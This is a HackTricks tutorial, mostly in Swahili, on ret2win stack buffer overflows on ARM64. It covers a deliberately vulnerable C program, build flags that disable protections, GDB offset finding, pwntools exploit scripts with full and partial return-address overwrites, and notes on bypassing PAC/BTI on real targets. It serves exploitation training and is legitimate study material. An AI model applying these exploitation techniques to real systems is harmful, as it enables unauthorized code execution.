Ret2win - arm64

Reading time: 7 minutes

Pata utangulizi wa arm64 katika:

Introduction to ARM64v8

Code

#include <stdio.h>
#include <unistd.h>

void win() {
printf("Congratulations!\n");
}

void vulnerable_function() {
char buffer[64];
read(STDIN_FILENO, buffer, 256); // <-- bof vulnerability
}

int main() {
vulnerable_function();
return 0;
}

Jenga bila pie na canary:

clang -o ret2win ret2win.c -fno-stack-protector -Wno-format-security -no-pie -mbranch-protection=none

• Bendera ya ziada -mbranch-protection=none inazuia AArch64 Branch Protection (PAC/BTI). Ikiwa toolchain yako kwa chaguo-msingi inaweka PAC au BTI, hii hufanya maabara iwe ya kurudiwa. Ili kukagua kama binary iliyojengwa inatumia PAC/BTI unaweza:
• Tafuta sifa za AArch64 GNU:
• readelf --notes -W ret2win | grep -E 'AARCH64_FEATURE_1_(BTI|PAC)'
• Chunguza prologues/epilogues kwa paciasp/autiasp (PAC) au kwa bti c landing pads (BTI):
• objdump -d ret2win | head -n 40

Ukweli mfupi kuhusu AArch64 calling convention

• The link register is x30 (a.k.a. lr), and functions typically save x29/x30 with stp x29, x30, [sp, #-16]! and restore them with ldp x29, x30, [sp], #16; ret.
• This means the saved return address lives at sp+8 relative to the frame base. With a char buffer[64] placed below, the usual overwrite distance to the saved x30 is 64 (buffer) + 8 (saved x29) = 72 bytes — exactly what we’ll find below.
• The stack pointer must remain 16‑byte aligned at function boundaries. If you build ROP chains later for more complex scenarios, keep the SP alignment or you may crash on function epilogues.

Kupata offset

Chaguo la pattern

Mfano huu ulitengenezwa kwa kutumia GEF:

Anzisha gdb na gef, tengeneza pattern na uitumie:

gdb -q ./ret2win
pattern create 200
run

arm64 itajaribu kurudi kwa anwani katika register x30 (iliyoharibika), tunaweza kutumia hiyo kupata pattern offset:

pattern search $x30

Offset ni 72 (9x48).

Stack offset chaguo

Anza kwa kupata stack address ambapo pc register imehifadhiwa:

gdb -q ./ret2win
b *vulnerable_function + 0xc
run
info frame

Sasa weka breakpoint baada ya read(), endelea hadi read() itakapotekelezwa, kisha weka pattern kama 13371337:

b *vulnerable_function+28
c

Gundua wapi muundo huu umehifadhiwa katika kumbukumbu:

Kisha: 0xfffffffff148 - 0xfffffffff100 = 0x48 = 72

No PIE

Ya kawaida

Pata anwani ya function ya win:

objdump -d ret2win | grep win
ret2win:     file format elf64-littleaarch64
00000000004006c4 <win>:

Exploit:

from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)
# Optional but nice for AArch64
context.arch = 'aarch64'

# Prepare the payload
offset = 72
ret2win_addr = p64(0x00000000004006c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Off-by-1

Kwa kweli hii itakuwa zaidi kama off-by-2 kwenye PC iliyohifadhiwa kwenye stack. Badala ya kuandika juu ya return address yote, tutaandika tena baiti 2 za mwisho pekee na 0x06c4.

from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x06c4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Unaweza kupata mfano mwingine wa off-by-one kwenye ARM64 kwenye https://8ksec.io/arm64-reversing-and-exploitation-part-9-exploiting-an-off-by-one-overflow-vulnerability/, ambao ni off-by-one halisi katika udhaifu wa kubuni.

Kwa PIE

Off-by-2

Bila leak hatujui anwani kamili ya win function lakini tunaweza kujua offset ya function kutoka binary na tukijua kwamba return address tunayoandika juu yake tayari inarejea kwa anwani iliyo karibu, inawezekana leak offset ya win function (0x7d4) katika kesi hii na kutumia offset hiyo tu:

from pwn import *

# Configuration
binary_name = './ret2win'
p = process(binary_name)

# Prepare the payload
offset = 72
ret2win_addr = p16(0x07d4)
payload = b'A' * offset + ret2win_addr

# Send the payload
p.send(payload)

# Check response
print(p.recvline())
p.close()

Notes on modern AArch64 hardening (PAC/BTI) and ret2win

• Ikiwa binary imejengwa kwa AArch64 Branch Protection, unaweza kuona paciasp/autiasp au bti c zikizalishwa katika prologue/epilogue za function. Katika hali hiyo:
• Kurudi kwa anwani ambayo si BTI landing pad halali kunaweza kusababisha SIGILL. Tumia kulenga entry halisi ya function inayojumuisha bti c.
• Ikiwa PAC imewezeshwa kwa returns, kuandika upya return‑address kwa njia rahisi kunaweza kushindwa kwa sababu epilogue inafanya authentication ya x30. Kwa mafunzo, jenga upya na -mbranch-protection=none (imeonyeshwa hapo juu). Unaposhambulia targets halisi, pendelea hijack zisizo za return (mfano, function pointer overwrites) au jenga ROP ambayo haitawahi kutekeleza jozi ya autiasp/ret inayothibitisha LR yako bandia.
• Kuangalia sifa kwa haraka:
• readelf --notes -W ./ret2win na tazama taarifa za AARCH64_FEATURE_1_BTI / AARCH64_FEATURE_1_PAC.
• objdump -d ./ret2win | head -n 40 na tazama bti c, paciasp, autiasp.

Running on non‑ARM64 hosts (qemu‑user quick tip)

If you are on x86_64 but want to practice AArch64:

# Install qemu-user and AArch64 libs (Debian/Ubuntu)
sudo apt-get install qemu-user qemu-user-static libc6-arm64-cross

# Run the binary with the AArch64 loader environment
qemu-aarch64 -L /usr/aarch64-linux-gnu ./ret2win

# Debug with GDB (qemu-user gdbstub)
qemu-aarch64 -g 1234 -L /usr/aarch64-linux-gnu ./ret2win &
# In another terminal
gdb-multiarch ./ret2win -ex 'target remote :1234'

Kurasa zinazohusiana za HackTricks

Ret2syscall - ARM64

Ret2lib + Printf leak - arm64

Marejeo

• Kuwezesha PAC na BTI kwenye AArch64 kwa Linux (Arm Community, Nov 2024). https://community.arm.com/arm-community-blogs/b/operating-systems-blog/posts/enabling-pac-and-bti-on-aarch64-for-linux
• Kiwango cha Mwito wa Taratibu kwa Architecture ya Arm ya 64-bit (AAPCS64). https://github.com/ARM-software/abi-aa/blob/main/aapcs64/aapcs64.rst